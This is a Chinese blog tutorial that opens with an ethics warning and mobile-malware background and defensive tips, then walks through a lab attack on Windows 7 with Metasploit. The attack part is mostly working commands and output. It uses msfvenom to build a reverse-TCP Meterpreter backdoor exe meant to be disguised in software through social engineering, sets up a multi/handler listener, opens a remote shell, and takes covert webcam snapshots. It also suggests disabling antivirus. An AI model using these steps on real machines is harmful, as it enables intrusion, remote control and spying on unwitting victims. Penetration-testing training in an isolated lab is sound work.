MSF恶意程序利用【实战】

2024-08-19 13:55:39 浏览数 (2)

★关于道德伦理的忠告★

关于一些网络安全实战内容,我还是不厌其烦的写上这些忠告,请见谅。

以下内容摘自《Metasploit渗透测试指南》

作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:

  • 不要进行恶意的攻击;
  • 不要做傻事;
  • 在没有获得书面授权时,不要攻击任何目标;
  • 考虑你的行为将会带来的后果;
  • 如果你干了些非法的事情,天网恢恢疏而不漏,你总会被抓到牢里的。

1、手机恶意应用程序分析

1.1、手机恶意应用程序理解

手机恶意应用程序:一般是指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序。它是介于病毒和正常软件之间的软件,它与病毒的区别是:一般还具备一定的正常功能。

1.2、危害性

恶意程序中植入的木马程序 ,可在用户不知情的情况下 ,收集用户个人隐私信息、恶意扣费 。

1.3、如何实现?

很多APP由于存在大量安全漏洞和缺乏安全措施,被不法分子二次打包后,或被直接仿冒,或植入广告、恶意代码,甚至加入违法内容,重新投放应用市场,严重危害用户隐私与财产安全,网络“黑产”链条也开始滋生 。

1.4、“官方”八招对付

八招对付恶意软件【来源于人民日报】:

1、选择官方渠道下载

2、关注流量使用

3、谨慎ROOT

4、注意权限信息

5、安装防病毒软件

6、不要在未知安全性的WIFI网络中上网

7、及时止损

8、及时举报

2、MSF恶意程序利用

2.0、说明

因为手机恶意程序利用的实验,我自己没有验证过就暂不做分享,以win7实验做为示例。

2.1、制作window恶意获取shell

后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为

思路:利用社会工程学中人的心理,为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 。

2.1.1、简介

msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。

实验内容: 制作Windows恶意软件获取shell,msfvenom的shell在windows中的使用 msfvenom生成shell.exe

2.1.2、实验步骤
2.1.2.1、实验环境

kali-linux系统,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4

win7系统,IP:192.168.242.6

2.1.2.2、生成后门软件

在kali系统生成后门软件,然后先复制到外面(本机),再复制到目标系统win7

代码语言:javascript复制
msfvenom -p 添加载荷payload LHOST=监听的IP LPORT=监听的端口,只要不占用即可 -f 输出文件格式 > 目标文件的名称

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.4 LPORT=6060 -f exe > msftest.exe

注意:该步骤自己电脑的杀毒软件和防火墙需要暂时关闭,如果不想关闭的话,可以利用ms17-010漏洞上传文件到win7电脑,可以参考我前面写的《渗透测试实战-漏洞利用MS17-010》

2.1.2.3、启动侦听

在kali系统操作

代码语言:javascript复制
# 启动metaspliot
msfconsole

# 启动成功结果--每次的图案不一样,主要关注下面的是否有msf6>  即表示成功
Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 > 

# metasploit设置侦听 加载模块
msf6 > use exploit/multi/handler

# 引用成功结果 ,再在后面
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > 

# 设置payload
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

#设置kali的IP
msf6 exploit(multi/handler) > set lhost kali的ip

#设置kali的端口lport =6060,也就是生成后门的端口
msf6 exploit(multi/handler) > set lport 6060

#执行
msf6 exploit(multi/handler) > exploit 或者 run

# 结果
[*] Started reverse TCP handler on 192.168.242.4:6060 
2.1.2.4、win7系统双击后门软件

win7系统双击后门软件,然后观察kali系统会看到有对应信息串联起来,效果如下

代码语言:javascript复制
[*] Sending stage (175174 bytes) to 192.168.242.6
[*] Meterpreter session 1 opened (192.168.242.4:6060 -> 192.168.242.6:2327) at 2023-09-11 11:07:36 -0400
2.1.2.4、操作命令控制win7系统
代码语言:javascript复制
# 输入命令行
meterpreter > shell

# 连接成功
Process 8856 created.
Channel 1 created.

# 退出当前操作
exit

# 可进行拍照,只要目标系统有拍照功能
# 查看摄像头
meterpreter > webcam_list
# 结果表示有
1: Integrated Camera

# 通过摄像头拍照
meterpreter > webcam_snap

0 人点赞